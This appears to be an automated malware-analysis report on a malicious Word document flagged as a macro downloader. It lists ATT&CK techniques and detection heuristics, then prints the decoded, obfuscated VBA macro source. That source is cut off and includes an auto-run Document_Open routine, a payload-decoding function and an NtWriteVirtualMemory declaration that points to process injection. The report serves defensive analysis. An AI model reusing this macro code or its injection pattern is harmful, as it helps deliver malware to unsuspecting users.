Verdict: MALICIOUS (Risk Score 122)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is an Office document, and a critical heuristic (the ClamAV signature below) classifies it as a downloader. It contains a VBA macro named 'Document_Open', a common technique for executing code automatically when the file is opened. The macro code is obfuscated but appears designed to download and execute a secondary payload. The combination of VBA macros and a Document_Open subroutine strongly suggests delivery as a spearphishing attachment.
Heuristics (4)

- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11918 bytes | 0ebf6e82aab92edf946bc28e62977edaf62d45c80e3b1e1644f1f253b2c229c6 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim grias As Long
Dim chessman As Variant
unexerted = "perpendicular"
interdependent
digenesis = 43 + 37
Pmt 0, digenesis, 24000, 48243, 4
End Sub
Attribute VB_Name = "chalcopyrite"
Function baconian(cropper) As String
Dim bootikin As Long
Dim dilettant(63) As Long
Dim picaresco(63) As Long
Dim ostracoda(63) As Long
Dim doohickey As Long
Dim fountainhead() As Byte
Dim firearms(6962) As Byte
Dim fer As Long
Dim balalaika As Integer
Dim dicranaceae As Long
aix = gormandizing
Dim cleareyedsighted As String
electroencephalograph = 54 - 29 + 262119
codeine = 90 - 24 + 3966
chytridiaceae = 53 - 102 + 65329
ahuehuete = 117 - 92 + 230
Dim barm As Long
Dim overweening As String
hypallage = 123 - 66 + 16711623
Dim quakeress As Long
animatism = 31 - 113 + 65618
aphriza = 98 - 5 + 4003
bare = 95 - 87 + 258040
annelid = 77 - 13 + 16515008
archosaur = 9 - 5 + 59
positive = 57 - 83 + 282
greenwich = 21 - 39 + 82
Dim preaching As Byte
details = 27 - 42 + 7858
Dim highly() As Byte
highly = VBA.StrConv(cropper, 120 + 8)
pellaea = 25 + 6
Pmt 0, pellaea, 18816, 37014, 2
Shaded = 7843
congruous = vbKeyShift - 12
For comprehension = 0 To Shaded
If comprehension Mod 2 = 0 Then
highly(comprehension) = highly(comprehension) - congruous
Else
highly(comprehension) = highly(comprehension) - (congruous - 1)
End If
Next comprehension
avo = 30 + 8
Pmt 0, avo, 24836, 46679, 2
balalaika = 0
notissima = topheavy
For fer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
ostracoda(fer) = episodic(fer, greenwich, 38)
picaresco(fer) = episodic(fer, aphriza, 38)
dilettant(fer) = episodic(fer, electroencephalograph, 38)
Next fer
tiu = 58 + 46
Pmt 0, tiu, 14755, 46989, 5
fountainhead = highly
discoglossidae = 28 - 49 + 25
ectoproct = 42 + 36
Pmt 0, ectoproct, 7525, 34551, 6
namely = 91 - 126 + 38
aix = "disproportion"
aix = aix
diaphragm = namely + 1
assyrian = 73 - 50 - 21
For doohickey = 0 To Shaded
nectary = fountainhead(doohickey)
appaloosa = fountainhead(doohickey + 2)
snuffbox = picaresco(notissima(fountainhead(doohickey + 1)))
campylorhynchus = ostracoda(notissima(appaloosa)) + notissima(fountainhead(doohickey + namely))
dicranaceae = dilettant(notissima(nectary)) + snuffbox + campylorhynchus
fer = episodic(dicranaceae, hypallage, 30)
firearms(bootikin) = episodic(fer, animatism, 20)
fer = episodic(dicranaceae, chytridiaceae, 30)
firearms(bootikin + 1) = episodic(fer, positive, 20)
firearms(bootikin + assyrian) = episodic(dicranaceae, ahuehuete, 30)
bootikin = bootikin + assyrian + 1
doohickey = doohickey + 3
Next
baconian = firearms
End Function
Function episodic(supposed, exercitation, multinominal)
If multinominal = (20 + (10 / 2 - 5)) * 1 Then
episodic = supposed \ exercitation
ElseIf multinominal = (30 + (5 - 3) / 2 - 1) * 1 Then
episodic = supposed And exercitation
ElseIf multinominal = (38 + (56 / 7 - 4 * 2)) * 1 Then
episodic = supposed * exercitation
End If
End Function
Attribute VB_Name = "prestriction"
Attribute VB_Base = "0{6F029A80-1718-4C2F-86E3-BC261B49E611}{AE875FA0-DC79-4465-8532-4A546FE52C6F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub contemptuously_Change()
End Sub
Attribute VB_Name = "rModu"
#If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then
Public Declare Function marina _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal dispersion As Any, ByVal draped As Any, ByVal bifurcated As Any, ByVal automated As Any,
... (truncated)
```